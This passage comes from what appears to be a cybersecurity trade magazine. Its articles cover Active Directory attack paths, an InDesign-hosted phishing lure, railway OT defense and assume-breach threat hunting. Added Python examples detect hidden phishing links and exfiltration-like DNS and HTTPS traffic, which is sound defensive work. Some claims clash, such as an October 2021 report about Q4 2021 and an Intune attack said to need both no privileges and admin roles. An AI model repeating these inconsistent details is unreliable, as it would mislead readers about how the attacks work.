the face of an ever-growing and ever-changing digital landscape. In transitioning to cyber defense roles,
veterans are able to carry that focus on driving impactful change into meaningful work in the private
sector, leaning on their military training and background to provide a positive service that protects
everyday people.
10. Veterans are taught how to combat threats and take risks
At its heart, military service teaches veterans how to react to threats of virtually any degree and respond
to them accordingly. In the realm of cyber defense, those threats are as numerous as they are varied in
their potential intensity. Additionally, veterans understand that responding to threats in a timely and
responsible manner can entail the need to take risks—another commonality shared in cybersecurity.
Veterans who seek to transition their skills into the private cyber defense sector are valuable to the firms
which might employ them since they already possess this mindset; they know the importance of their
skills and the purpose they serve in protecting others. Because veterans are inherently trained on how to
combat and overcome threats, even in high-risk situations, this makes them a valuable pool of candidates
for the greater cybersecurity industry.
About the Author
Bryon Kroger is the founder of Rise8, which places the bureaucracy of
the US military and the technological innovations of Silicon Valley in the
same realm. As a veteran of the US Air Force, and co-founder of the
DoD’s first software factory Kessel Run, Kroger is bridging the gap
between the archaic practices of govtech and the speed that Silicon
Valley startups are known for. Bryon can be reached online at
bryon@rise8.com and at our company website https://rise8.us/.
5 Reasons Organizations Need Comprehensive AD
Security Across Cloud and On-Prem
Why Organizations Need to Secure Directory Services in a Hybrid Deployment from
Attack Paths
By Justin Kohler, Director of BloodHound Enterprise at SpecterOps
Microsoft Active Directory is one of the most common identity and access management platforms in the
world, which unfortunately makes it a prime target for attackers. Attack Paths in Active Directory (AD)
can give attackers nearly unlimited access to the rest of the network, allowing them to steal sensitive
information and deploy malware while avoiding detection. Like many other things in security, the task of
securing AD gets more complex as organizations move workloads to the cloud. The public cloud
providers have their own IAM infrastructure (Azure AD & Azure Resource Manager in Azure, IAM and
AWS Organizations in Amazon Web Services, etc.) that organizations need to defend along with on-premises
AD. Hybrid environments allow attacks to move from on-premises AD to the cloud or in reverse,
making use of weak spots in both. Comprehensive protection is the best way to ensure the organization’s
sensitive data remains safe.
Here are five reasons that organizations need to secure directory services in a hybrid deployment.
1. As cloud use grows, attackers are following the data
In October 2021, Microsoft reported that Azure and other cloud services grew 50% year over year in Q4
2021 and have grown between 47% and 62% every quarter since Q2 2020. The Covid-19 pandemic
accelerated the shift to the cloud across many industries, and the momentum hasn’t slowed down. As
data has moved to the cloud, malware has followed. A survey of CISOs conducted by IDC in mid-2021
found that 98% of respondents suffered at least one cloud data breach in the previous 18 months as
opposed to 79% in 2020. There’s every reason to believe that adversaries will continue to target the cloud
aggressively in 2022. Security and cloud teams should ensure they are not leaving gaps that attackers
can exploit in their identity and access management infrastructure that make it easier for adversaries to
target them.
2. The rapid rate of change in the cloud creates uncertainty and risk
Cloud platforms are still being actively developed, which means the underlying software changes
frequently. Cloud products and tools get merged with other products, removed, or overhauled on a regular
basis. This volatility increases security risk because it prevents security experts, whether they work in-house,
for a service provider or as a consultant, from understanding the cloud platform in detail. Every
time something changes, security pros need to re-learn how it works, what its weaknesses are and how
to protect it. Until they do, they’re more likely to make mistakes, overlook security gaps or introduce
insecure misconfigurations. Since cloud platforms are relatively new compared to on-premises software,
the talent pool and library of third-party resources for securing them are small to start with. These factors
make the cloud especially risky, and force organizations to continuously revise their cloud security
policies - increasing the chances that something will slip through the cracks.
For comparison, Microsoft Active Directory has been used for identity and access management on-premises
for two decades. There are a huge number of AD admins that understand the software inside
and out and an enormous library of third-party resources to help them do their job quickly and safely.
While many organizations still struggle to secure AD on-premises, AD security in the cloud has additional
barriers to security that make it even more important that security and cloud teams take it seriously.
3. The cloud has a larger attack surface and authentication is more complex than
on-premises
Cloud authentication systems are easier for attackers to exploit in some ways. First, they simply have a
larger attack surface. These systems are exposed to the internet by default, whereas on-premises AD is
closed to the internet by default. With on-premises AD, adversaries first needed access to the network
through a user’s credentials. In the cloud, they don’t even need that.
The systems that assign permissions to specific users or groups in the major cloud platforms also tend
to be more complex than they are in on-premises AD. For example, Azure AD uses at least three separate
systems to manage identity and access: Azure Active Directory, Azure Resource Manager, and the Azure
API Apps permissions system. Unfortunately, these systems can often conflict and make it unclear which
system is the source of truth. This makes it more difficult for security teams to audit who has access to
valuable systems, which in turn makes it harder for them to find and close down Attack Paths.
The more difficult it is to assign permissions, the more likely that Cloud or AD engineers will give blanket
permissions to large groups of users or give a problem user admin access to just make everything work.
After all, their main task is to ensure employees have access to the systems they need to do their jobs.
This complexity creates additional attack paths and undermines the expertise of security and Identity
Access Management engineers.
4. Attacks can move from Azure to on-prem AD
Attack Paths in AD don’t just stay on-premises or in the cloud; they can cross between environments. For
example, adversaries can move laterally from on-premises AD to Azure AD, escalate privilege within
Azure, and then move back from Azure to on-premises. They can do this by abusing Microsoft Endpoint
Manager to move laterally from an Azure tenant to an on-prem AD domain. This abuse becomes possible
when Windows devices have been Hybrid-Joined to both the Azure tenant and the on-prem Active
Directory domain. This attack can be carried out by an Azure tenant-authenticated user — no special
privileges or roles needed. Abusing one of the three endpoint management systems to execute
PowerShell scripts on hybrid-joined devices requires either the “Global Admin” or “Intune Administrator”
roles. This is why it’s vital to protect Active Directory both on-premises and in the cloud - because both
of them give attackers a way in.
5. Attack Paths open orgs up to dangerous attacks like ransomware
Attack Paths are a way for adversaries to get powerful access that lets them steal sensitive data, deploy
ransomware or other malware, achieve persistence in the network or add backdoors that will allow them
to instantly re-gain privileged access in the future. An adversary that is well versed in attacking AD (and
most adversaries are) can gain privileges and move freely along Attack Paths with minimal risk of
discovery by defenders, achieve persistence, and gain the keys to the kingdom. Ransomware is a
particularly active threat at the moment; approximately 37% of global organizations said they were the
victim of some form of ransomware attack in 2021, according to IDC's "2021 Ransomware Study." The
FBI's Internet Crime Complaint Center received 62% more ransomware reports year-over-year in the first
half of 2021. To reduce their vulnerability to all these attacks and stop problems like ransomware at their
source, organizations should work on eliminating the Attack Paths in their AD environment.
Identity and access management on-premises and in the cloud are two sides of the same coin.
Organizations with a hybrid infrastructure model must protect both in order to keep their users and data
safe.
About the Author
Justin Kohler is the director for the BloodHound Enterprise product
line at SpecterOps. He is an operations expert who has over a decade
of experience in project and program development. After beginning
his career in the US Air Force, he worked for several consulting firms
focused on process and workflow optimization and held positions at
Microsoft and Gigamon. He enjoys building and leading teams
focused on customer delivery at Fortune 500 companies.
Justin can be reached online at @JustinKohler10 and at our company
website https://bloodhoundenterprise.io/
Directed Analytics - The Future of Data Management
By Simon Rolph, CEO & Founder of Such Sweet Thunder
The world as we know it has changed - it’s undisputed. Industries of all kinds face a wholly
different landscape compared to 18 months ago, and the data industry is no exception. With
each step we take into this new environment, new technologies are being developed to fit unique
business needs, ultimately improving our capabilities.
The data analytics industry has proliferated in recent years, with the global market expected to
value $132.9 billion by 2026, a nearly 500% growth from its valuation of $23 billion in 2019. As
an evolution of data analytics, directed data analytics is an essential step in making efficient and
accurate business decisions.
Defining directed analytics
In comparison to traditional data analytics, directed data analytics offers rapid information about
new trends in the market. This allows companies to make data-driven decisions faster, reducing
the delay between analysis and action. Ultimately, data has a short life span, and in today’s fast-moving
world it is vital to act on data as quickly as possible.
Not only this, directed data analytics means companies can stay on top of a continuous and
increasing stream of data, allowing more extensive databases to be built whilst allowing for
analysis on a wider scale.
Directed data analytics aims to move on from the digital dashboard approach that has been a
core part of the industry for so long. Whilst dashboards are fit for the purpose they were created
for, businesses are now looking for solutions that are fluid and fast-changing. Dashboards can’t
provide the speed to keep up with the rapid onslaught of data that exists in the modern world.
Similarly, when dashboards first emerged, they weren’t just a big step forward for data
management - they were also a significant advance for MIS (Management Information Systems)
and EIS (Executive Information Systems). However, they haven’t yet evolved sufficiently to
continue to be efficient and effective in this area.
Being directed in a competitive landscape
Directed data analytics offers the next generation of data reporting, providing a multitude of data
in a short period, displayed in a customised way that is fit for the user and company, and
compiling the data into a broader industry context in order to visualise long-term trends and
patterns. This approach is crucial for businesses to remain competitive and stay ahead, with
industries changing at a rapid pace and global events happening on an unprecedented scale.
Providing feedback on product performance, marketing strategies and customer experience,
directed analytics is fundamental for businesses in today’s climate. Without this crucial, timely
information, leaders cannot confidently make decisions that will allow them to improve
performance, profitability and employee satisfaction.
The future of data analysis
Many companies have the data analysis tools and infrastructure they need, but the analysis fails
to have a more comprehensive business impact due to red tape and lack of agility. Data can
often remain stuck in dashboards, reports aren’t circulated to the relevant people, and crucial
insights don’t reach senior decision-makers.
The distinction here is that the technology is widely available and often already implemented;
however, it is the corresponding data analysis that fails to have an impact. It’s what the data
means that needs to be communicated, not the data itself.
Directed analytics allows these insights to become a part of everyday workflows. Integrating
insights into a business’ existing workspaces and tools means that users don’t need to access
specific dashboards or applications to find the data and then analyse it themselves. The future
of directed analytics will mean that employees can ask questions and get simple, straightforward
answers grounded in data, allowing them to work seamlessly, and make smarter decisions at a
faster rate.
In order to progress, the directed data analytics industry needs to become almost invisible; so
seamlessly integrated and providing insights so effortlessly that it causes no disruption to
business’ daily operations.
About the Author
Simon Rolph, CEO & Founder of Such Sweet Thunder. Simon is the
founder of data analytics firm, Such Sweet Thunder, and has been
CEO since its inception in 2007. As an experienced interim software
engineer, business analyst and IT project manager, specialising in
Data Management and Analysis projects, Simon has over 25 years
of successfully delivering complex, high-value cross sector projects
and programmes for ‘Blue Chip’ internationally renowned
organisations.
Simon’s goal as CEO of Sweet Thunder is to create a great
environment for people to work delivering simple solutions to complex
problems that make a tangible difference for our clients.
Simon can be reached at our company website https://www.sweetthunder.co.uk/
Phishing Techniques in Disguise: What to Look for And
Why You Should
By Rotem Shemesh, Lead Product Marketing Manager, Security Solutions, at Datto
Phishing is a familiar concept to cybersecurity professionals - and hackers. According to a recent study,
phishing attacks are the method of choice of cyber criminals attempting to infiltrate an organization. Why?
Because they are easy to deploy and the opportunity for human error when clicking on a phishing email
is high.
When many of us hear the term “phishing” we may picture an obvious spam email that came from an
easily recognizable fake email address. But it isn’t always that simple to spot a phishing attempt. It’s
important to educate organizations on ways to avoid falling victim to phishing attempts, including how to
identify the different shapes they can come in. Recently, Datto SaaS Defense detected a threat that was
disguised as a communication hosted on a trusted domain, which enabled the attackers to operate below
the radar of detection.
New technique bypasses security detection
This new phishing technique included two key elements that made it impossible for most security
solutions to detect. The attack leveraged Adobe InDesign hosting reputation to hide a malicious link in
an iframe. With the goal of harvesting users’ credentials, the attack was sent via email to lure users into
clicking a link to access a shared document. The link directed people to a fake webpage designed using
InDesign and uploaded to indd.adobe.com, a legitimate URL. Hosting a phishing attack in a known URL
is not uncommon, but this was the first time we saw it done in InDesign. The InDesign domain also has
certain characteristics that enabled the bad actors to conceal the malware; the link was hidden in an
image (something that is possible in InDesign) and therefore was not identified as a URL when scanned
by many security solutions. This masking technique enables attackers to avoid raising suspicions and
bypass many email detection measures.
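As an added example (not Datto's code or SaaS Defense logic), the following Python flags the two hiding tricks described above in an HTML mail body: a document-hosting domain loaded in an iframe, and a link placed behind an image so that no URL text is visible to the reader or to a naive link scanner. The host set, the placeholder document IDs and both sample messages are constructed for this example; only indd.adobe.com comes from the article.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Document-hosting services whose good reputation a phisher may borrow.
# indd.adobe.com is the host named in the article; extend as an assumption.
DOCUMENT_HOSTS = {"indd.adobe.com"}


class HiddenLinkFinder(HTMLParser):
    """Collect (kind, url) findings while walking an HTML email body."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._open_href = None  # href of the <a> we are currently inside

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            # Content pulled in from elsewhere; the recipient never sees the URL.
            self.findings.append(("iframe", a["src"]))
        elif tag == "a" and a.get("href"):
            self._open_href = a["href"]
        elif tag == "img" and self._open_href:
            # A clickable image: the destination is never shown as text.
            self.findings.append(("image_link", self._open_href))

    def handle_endtag(self, tag):
        if tag == "a":
            self._open_href = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def scan_email_html(html, document_hosts=DOCUMENT_HOSTS):
    """Return findings whose destination is on a document-hosting domain.

    Each finding is (kind, url, host). A plain, visible text link to the same
    host is not reported: the signal is the hiding, not the host alone.
    """
    parser = HiddenLinkFinder()
    parser.feed(html)
    parser.close()
    return [(kind, url, _host(url))
            for kind, url in parser.findings
            if _host(url) in document_hosts]


# Constructed sample lure: a "shared document" image that links out to a page
# on indd.adobe.com, plus a 1x1 iframe from the same host. EXAMPLE-ID is a
# placeholder, not a real document identifier.
LURE = """
<html><body>
<p>A document has been shared with you.</p>
<a href="https://indd.adobe.com/view/EXAMPLE-ID"><img src="cid:doc.png"></a>
<iframe src="https://indd.adobe.com/embed/EXAMPLE-ID" width="1" height="1"></iframe>
</body></html>
"""

# Constructed sample of an ordinary newsletter with a visible, labelled link.
BENIGN = """
<html><body>
<p>Read the full post on <a href="https://blog.example.com/post">our blog</a>.</p>
<img src="https://blog.example.com/banner.png">
</body></html>
"""

if __name__ == "__main__":
    for name, body in (("lure", LURE), ("benign", BENIGN)):
        print(name, scan_email_html(body))
```

A hit is a reason to detonate or quarantine the message for review, not proof of malice on its own, since legitimate InDesign shares use the same host.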
This was the first time this type of technique was confirmed as a phishing attack; luckily, it was uncovered
before causing serious damage. But, this new type of threat shows just how constant - and dangerous -
the evolution of the cybersecurity landscape is. Cyber criminals are, unfortunately, usually one step
ahead of their targets, and it’s critical to stay up to date on the latest techniques being used to best protect
yourself and your organization. To build a strong cyber detection and prevention plan against phishing
attempts, there are many steps companies can, and should take.
Prepare for the worst
So, what are companies or security-based solutions supposed to do when faced with a tricky challenge
like this one?
The first step is to ensure your organization has the most up-to-date and advanced security protections
in place. Basic email security is not enough - it’s critical to have a security platform in place that can
detect more advanced and emerging phishing techniques, especially the ones that have not yet been
discovered or even developed. It’s also more important than ever that organizations adopt an assumed
breach mentality: plan for when a cyber attack will happen, not if. Remote work and increased use of
cloud-based SaaS platforms are essentially invitations to bad actors. As useful as these technologies
are, they open up gaps for malware to enter a system when you least expect it.
Implementing security solutions to help with detection and prevention is important, but it’s even more
necessary to develop cyber resilience in your company. A strong cybersecurity approach is one that
starts with an assumed breach mentality within an organization, and ends with building a cyber resilience
foundation. Cyber resilience is not a product or attitude, but rather an ongoing journey with an evolving
mindset to grow as new threats and technologies continue to emerge. Together with an assumed-breach,
cyber-resilient culture, your company will not only be prepared for the next vulnerability around the corner,
but also will have the ability to respond and quickly recover from an adverse cyber event.
In an ever-changing digital environment, security can no longer afford to be an afterthought. It is the
responsibility of each organization to ensure that when a threat emerges, they are able to minimize the
risk to prevent the attack from growing and wreaking havoc on themselves or others, such as their
customers. It is too easy for cyber attacks to quickly spread and have a ripple effect that can impact
thousands. As dangerous cyber criminals become smarter, we must too, and take the proper steps to
fight back.
About the Author
Rotem Shemesh is the Lead Product Marketing Manager for
Security Solutions at Datto and plays a significant role in
expanding and positioning Datto’s cybersecurity offerings. She
was the head of marketing at BitDam and was responsible for all
marketing and Go-to-Market efforts for 3 years. At BitDam, when
it was a small cybersecurity start-up, she established the
company’s marketing efforts from the ground up and was
instrumental in the company’s success over the years, as well as
the effective merge with Datto. Building BitDam’s marketing
strategy, messaging and brand, as well as driving demand
generation, communications, and channel marketing, she
successfully positioned the company as a disruptive
cybersecurity startup well recognized by the market, analysts, journalists, and other industry players.
Rotem can be reached online at @ShemeshRotem and at our company website Datto.com
Are You Prepared for the New Normal of Jekyll and Hyde
Data?
An organization’s data and secrets are simultaneously its greatest assets and its greatest
risks.
By Howard Ting, CEO, Cyberhaven
Recently Twitch suffered a devastating hack that exposed its most sensitive data and intellectual property
including source code, unreleased product information, streamer earnings, and more. For security teams
and enterprise leaders, this attack should make the hair on the back of their necks stand up. This is a
worst-case scenario breach, designed to cause maximum disruption, and yet, there wasn’t any regulated
data in sight.
The attack was all about exposing the IP and trade secrets of the business itself. Recent ransomware
attacks have followed a similar blueprint by threatening to expose an organization’s secrets. This changes
how an organization must view the risk to its data. While a traditional ransomware attack can be
measured in downtime, when secrets are published, the damage is permanent. Data risk must now be
viewed in truly strategic terms, not just operational.
Coincidentally, this was the same week that Facebook was once again scrambling to contain the fallout
from leaked internal documents and information. These events require organizations to reassess how
they use and protect their most sensitive data. It isn’t enough to simply quarantine away PCI or HIPAA-regulated
data and call it a day. Virtually all enterprise data is now in play when it comes to risk. Yet at
the same time, data is being shared more than ever before, and collaboration is an essential part of
modern work. Organizations must be ready to navigate this apparent paradox to get the most out of their
data while minimizing the risk.
The Two Faces of Enterprise Data
An organization’s data and secrets are simultaneously its greatest assets and its greatest risks. On its
good side, data is the oxygen that keeps the enterprise alive and lets it thrive. And like oxygen, data
needs to move and be consumed so that users can collaborate and create. And today this sharing occurs
across a constantly evolving suite of applications and services including sanctioned enterprise apps as
well as personal use apps.
Yet all this sharing and collaboration opens the door to loss, misuse, or abuse of that data and can
transform data from Jekyll to Hyde. Viewed from the perspective of risk, data is less of a life-giving oxygen
and more like a self-spreading, self-replicating virus. Every user that downloads sensitive data could
potentially make a copy. Data could be copy/pasted into another file, uploaded to a personal cloud, or
shared via chat, personal email, or countless other methods. Every data access can turn into a number
of unseen derivatives, each with its own potential for loss or misuse.
Focus on the Data Actions
So which is it? Is our data oxygen or a toxic virus? The answer is that it is both. The difference between
data being nourishing or toxic depends on the actions and context surrounding it. The good or bad rests
in how the data moves, is modified, and shared. Just as importantly, we need to know the data’s history.
Where did the data come from? What user or app created it and how has it changed? So not only do we
need to know the actions surrounding a piece of data, we need to know its lineage.
The Way Forward
Organizations need a new approach to data security that can provide this lineage and resolve the Jekyll
and Hyde problem by passively watching how data is created, modified, and shared. Every action must
be tracked and correlated to build a complete history of every piece of data. This opens up a far more
powerful approach to securing data that lets organizations do the following:
• Secure Any Type of Data - Any data can be traced and analyzed without the need for signatures
or tagging. This lets organizations protect virtually any type of IP or content based on its actual
value to the enterprise. Source code, ML models, financial projections, and product designs can
all easily be protected equally.
• Safely Enable Work and Collaboration - Users need to share and collaborate to do work without
losing control. Policies can align with business processes to define how data can be shared and
with whom while preventing oversharing or misuse.
• Find Unseen Risk - The hardest part of security is often to control the “unknown unknowns”.
Enterprises need a tool that automatically and continuously traces all data, which can find
sensitive data in places the security team didn’t even know to look.
In the end, data doesn’t have to be treated as Jekyll or Hyde. Instead, security policies can automatically
follow the true value to the enterprise and adapt to how it is actually being used.
About the Author
Howard Ting is the CEO of Cyberhaven. Howard Ting joined
Cyberhaven as CEO in June 2020. In the past decade, Howard has
played a critical role in scaling Palo Alto Networks and Nutanix from
initial sales to over $1B in revenue, generating massive value for
customers, employees, and shareholders. Howard has also served
in GTM and product roles at Redis Labs, Zscaler, Microsoft, and
RSA Security. Howard can be reached on Twitter and at our
company website https://www.cyberhaven.com/.
How To Defend Railway Subsystems from Targeted
Cyber-Attacks
By Michael Cheng, Director at TXOne Networks & C. Max. Farrell, Senior Technical Marketing
Specialist at TXOne Networks
Railways are a critical part of every nation’s vital system. Maintaining the constant operation of railway
systems requires protection from many threats, and disruption can harshly impact a nation’s society,
economy, and culture. As the critical industry of railways continues to grow, the risk of cyber-attacks has
risen sharply.
This creates a need for powerful cybersecurity solutions that can be rapidly and conveniently integrated
into routine railway operations to safeguard these critical networks and systems. In addition, these
solutions should be resource efficient and transmit data fast enough to keep up with commuter traffic and
to accommodate the distributed nature of modern railway technologies.
The vulnerable architecture of railway assets
Cyber attacks on national utilities and transport networks have increased massively recently, but they are
by no means new. Back in 2015, security specialists set up a realistic simulated rail network at the CeBIT
trade fair in Hannover and put it online to see how much attention it would attract from hackers. Over its
6-week runtime, 2,745,267 cyber attacks were documented, and in “about 10 percent of the attacks”
intruders were able to gain control over simulated assets.[1] Would-be attackers’ knowledge of railway
systems has progressed even further in the seven years since this experiment.
On the one hand, the distributed network architecture of the railway infrastructure allows incredible
adaptability and the use of a wide variety of modular assets. On the other hand, many of these assets
are no longer up-to-date or patchable. So, the fast-changing nature of cyber threats comes
up against the long service life and diversity of equipment, making the enforcement of security policies
daunting. The same high-connectivity pathways that increase accessibility for trusted railroad engineers
also increase accessibility for malicious intruders, which is why specially designed cybersecurity
appliances and software can be so essential.
Every system needs individual protection
Each rail subsystem is a different set of assets with its own individual cybersecurity requirements. Every
rail subsystem application classified as security-relevant has been systematically type-tested and
secured according to the relevant certifications before leaving the factory. However, the downside of
certifications is that they introduce general patterns into defenses that hackers can learn to anticipate
and exploit. Defenses for critical services need to go beyond the bare minimum necessary to meet
certifications or regulations and include protections that give hackers a hard time. Furthermore, the
ongoing support of dedicated security researchers is necessary to adapt these defenses against new
cyber threats.
User-friendly tailored solutions
Cybersecurity begins with education of the staff, but the busy day-to-day work of railway personnel rarely
leaves space for that. Thus, all defensive solutions must be as failsafe and streamlined as possible to
promote ease of use. Ideally railway subsystems need appliances that have the necessary protocol
sensitivity to check network traffic for suspicious actions and deny unusual or unlikely behavior. Such
appliances have the further benefit of significantly reducing the likelihood of human error.
Each subsystem is dependent on solutions created to meet its specific needs. TXOne Networks suggests
an OT zero trust approach to securing operational environments, which includes three phases:
segmenting networks, scanning inbound and mobile assets with a portable rapid-scan device, and
securing endpoints with defensive solutions tailored to the endpoint’s type (legacy or modernized).
Stop intruders and isolate malware
Traditional intrusion prevention systems (IPSes) were mere filtering systems, which are no longer
adequate protection for critical infrastructure networks. Instead, modernized solutions like TXOne’s Edge
series of next-generation IPSes and firewalls bring more sophisticated protection to assets at the station
and wayside. Edge series defenses, based on the OT zero trust methodology, detect suspicious behavior
[1] Vlad Gostomelsky, “Securing the Railroads from Cyberattacks”, Mass Transit Magazine, Dec 17 2019
on legitimate accounts or from legitimate devices, put a virtual patching “shield” around legacy assets
that cannot be patched or replaced, and segment networks so that they’re much more defensible.
The access points (APs) that a train uses for mesh or roaming are often running with limited or hardly
any security, enabling intruders to potentially affect the signal control system. An EdgeIPS solution is
perfect for deployment between the AP and its switch, preventing attackers from accessing or affecting
the network.
Safeguarding mobile and stand-alone assets
One common way dangerous threats get into OT environments is devices brought on-site by vendors or
maintenance experts. That is why, in addition to routine scans of deployed technology, security experts
recommend using dedicated mobile security devices for pre-scans of new devices before they are
deployed on the network. Such a device can be used to set up a checkpoint where all laptops and other
devices brought on-site are scanned. This requires a solution with the ability to conduct quick scans
without the need for software installations so that it can be used for checkpoint scans as well as for
sensitive equipment that cannot accept installations.
How to protect fixed-use and legacy assets
For fixed-use systems such as ticket vending machines and on-board computers, a trust list-based ICS
endpoint protection application is the ideal solution. Even if malware finds its way into a company’s
working hardware, it cannot be executed because of the trust list-based lockdown. For example,
applications, configurations, data, and USB devices are all locked down with a trust list. It excludes all
unlisted applications from running and unlisted users cannot make changes to data or configurations.
Only administrator-approved USB devices can connect to the device, and only an administrator can grant
a device one-time permission to connect.
Conclusion
In today’s world bad actors and criminal organizations prefer to conduct their attacks over the internet
from the comfort of their computer chairs – which makes them even more dangerous. To secure daily
operations and maintain passenger confidence, computation must be protected from disruption while
maintaining maximum availability, with no aspect of the exchange using more time or resources than
necessary. This is why specially designed cybersecurity appliances and software are so essential to the
protection of railway subsystems.
Additional information can be found at www.txone-networks.com and https://www.txonenetworks.com/white-papers/content/securing-autonomous-mobile-robots
About the Authors
Michael Cheng is a director at TXOne Networks with 20 years of experience
in global product management, software development, quality assurance,
and cybersecurity for IT, OT, and ICS environments. He holds an ISA/IEC
62443 Cybersecurity Expert certification.
Michael Cheng can be reached online at michael_cheng@txonenetworks.com
or at contact@txone-networks.com
C. Max Farrell is a senior technical marketing specialist for TXOne
Networks, where he has worked from a background in cybersecurity,
technology, and business since 2019. He conducts research related to
industry-critical technology, economy, and culture.
C. Max Farrell can be reached online at max_farrell@txonenetworks.com
or at contact@txone-networks.com
Biggest Cyber Trend in 2022
You Can’t Fix Stupid
By Guy Rosefelt, CPO, Sangfor Technologies
Stop me if you have heard this one: a customer is working late at night, been a long day, and very tired.
Customer needs to clear a few remaining emails including one from the CEO. Without thinking about it,
customer opens the email from the CEO, barely skims it and opens the attached Word document. Just
as the Word doc opens, customer realizes the email looks a bit odd and then it hits, it is a phishing email.
Laptop infected.
Sound familiar? That just happened to my customer yesterday. And he knows better but was tired and
on autopilot. We spent an hour online trying to figure out how bad the infection was and if he should wipe
out his system and reimage since he had just done a full backup the week before. We decided to err on
the side of caution and wipe and restore.
The moral of the story is anti-phishing will never be 100% successful. The best security products are only
ninety-nine point something successful, but even at that rate with the number of emails received in an
organization daily, a few are going to get through. And someone will click on one. My customer is normally
very diligent, but he slipped. Worse, there are a few employees in every company that do not really check
to see if emails are suspicious and will open them anyway.
Why am I rehashing this old trope? Because Barracuda Networks reported a 521% increase in phishing
emails using the COVID-19 Omicron variant to entice victims between October 2021 and January 2022.
People looking for home testing kits were prime targets and easy prey. Webroot reported a 440%
increase in May 2021. And more will keep coming.
“So, Guy,” you may ask, “how can you save us from phishing?” Well, I cannot, and no one else can either. What we need to do is bite the bullet and shift our strategy from trying to block everything to assuming we are already compromised, breached, hacked, etc. Once you start from that viewpoint, it does not matter that you cannot fix stupid; you just have to deal with the aftermath. Your focus is now on threat hunting, looking for signs of compromise. Do you have tools that can watch for the low-and-slow network behavior that indicates stealthy scanning? Can you identify regular bursts of encrypted traffic to somewhere out on the internet that might be data being exfiltrated? Can you track system resource utilization for signs of cryptomining or other malicious behavior?
What makes these behaviors hard to spot is that the malware is built to stay hidden, and attackers are increasingly weaponizing artificial intelligence (AI) in advanced persistent threats (APTs) and other malware payloads. The software that gets installed is smarter than you think. It will check for specific targets, domains, even countries before it decides to activate. It can hide inside legitimate processes running in memory, evading security scans. It can disable the security software on the system without you knowing about it.
There is a publicly available batch script called Defeat-Defender that can shut down Windows Defender processes silently, and it is said to masquerade as a legitimate process in order to get past Windows Tamper Protection. Two caveats a defender should keep in mind: stopping Defender's services and changing its configuration requires administrative rights on the host, so the privileges of the account that opened the attachment decide how far the script gets; and the actions it takes (Defender services stopping, Tamper Protection changing state) are themselves high-fidelity detections if you collect endpoint telemetry. All from opening an infected Word document.
I see heads shaking in despair and a few of you getting ready to jump out of your office windows (you
realize some of you work in the basement…). But there is a strategy that can help you through this dark
and difficult time. You need to do 4 extremely simple and painless things:
1. Look for and minimize attack surfaces
Conduct external and internal attack surface assessments to find the paths an attacker's malware could use to get in. Look for signs that those surfaces have already been exploited. Then work to close those holes.
2. Deploy AI-based detection and response
You need to use AI to combat AI, but not just any AI. Security tools that employ broad-based AI will not find the signs of stealthy activity or APTs. Purpose-built models designed to identify very specific behaviors are needed, such as spotting an abnormal volume of DNS requests to malicious or never-seen domains, or short periods of bursty HTTPS traffic during off hours; both can indicate data exfiltration.
3. Improve security system synergy
Every security product has a sphere of influence covering its own security domain. But those domains do not overlap, which leaves gaps that AI-enabled APTs can exploit. Having security products share data in real time and coordinate responses can close those gaps.
4. Augment security operations and resources by using security services
Face it, you do not have enough time, staff, or resources to go into threat hunting mode. And if you are
breached and under attack, can you really do incident response (IR)? Even the security teams in the
largest organizations are resource limited. Leverage your VAR or security vendor to provide resources
to backfill your team, help conduct assessments and IR, and do managed detection and response. Think
of it as a home security monitoring service available 24 hours a day; that is there when the breach occurs
during off-hours.
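As an added illustration of the hunting described in point 2, the following Python (not the author's or Sangfor's code) runs two of those checks over constructed flow records: a host issuing an abnormal burst of DNS queries, and off-hours HTTPS egress that spikes in a short window. The thresholds, the 08:00-17:59 business-hours window and the sample traffic are assumptions chosen for the demo; in production the thresholds come from a per-host baseline.

```python
"""Added example: two of the hunting checks from point 2, run over constructed
flow records. Not the article's code; thresholds and records are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

BUSINESS_HOURS = range(8, 18)   # 08:00-17:59 local time counts as "on hours" (assumption)


def _constructed_flows():
    """Constructed netflow-style records: (timestamp, src_host, dst_port, bytes_out).
    ws-03 is a normal daytime workstation; ws-07 behaves like the infected laptop."""
    flows = []
    for i in range(20):                       # ws-03: a DNS lookup then a page fetch every 2 min
        t = datetime(2022, 3, 1, 10, 0) + timedelta(minutes=2 * i)
        flows.append((t, "ws-03", 53, 90))
        flows.append((t + timedelta(seconds=2), "ws-03", 443, 60_000))
    for i in range(40):                       # ws-07: 40 DNS queries inside one minute at 02:05
        flows.append((datetime(2022, 3, 1, 2, 5, 0) + timedelta(seconds=i), "ws-07", 53, 70))
    for i in range(3):                        # ws-07: three 2 MB HTTPS uploads at 02:10-02:12
        flows.append((datetime(2022, 3, 1, 2, 10) + timedelta(minutes=i), "ws-07", 443, 2_000_000))
    return flows


SAMPLE_FLOWS = _constructed_flows()


def dns_query_outliers(flows, window=timedelta(seconds=60), threshold=25):
    """Hosts that issue more than `threshold` DNS queries inside any sliding window."""
    times_by_host = defaultdict(list)
    for t, host, port, _ in flows:
        if port == 53:
            times_by_host[host].append(t)
    flagged = []
    for host, times in times_by_host.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:      # slide the window's left edge forward
                start += 1
            if end - start + 1 > threshold:
                flagged.append(host)
                break
    return sorted(flagged)


def off_hours_https_bursts(flows, bucket=timedelta(minutes=5), min_bytes=1_000_000):
    """Per host, time buckets outside business hours whose outbound HTTPS volume
    reaches `min_bytes`; returns {host: [(bucket_start, bytes), ...]}."""
    totals = defaultdict(int)
    for t, host, port, nbytes in flows:
        if port != 443 or t.hour in BUSINESS_HOURS:
            continue
        bucket_start = t - ((t - datetime.min) % bucket)   # align to the bucket boundary
        totals[(host, bucket_start)] += nbytes
    hits = defaultdict(list)
    for (host, start), total in sorted(totals.items()):
        if total >= min_bytes:
            hits[host].append((start, total))
    return dict(hits)


def hunt(flows):
    """Summary a hunter would triage: who looks like DGA/beacon DNS, who looks like exfil."""
    bursts = off_hours_https_bursts(flows)
    return {
        "dns_outliers": dns_query_outliers(flows),
        "exfil_suspects": sorted(bursts),
        "bytes_off_hours": {h: sum(n for _, n in b) for h, b in bursts.items()},
    }


if __name__ == "__main__":
    print(hunt(SAMPLE_FLOWS))
```

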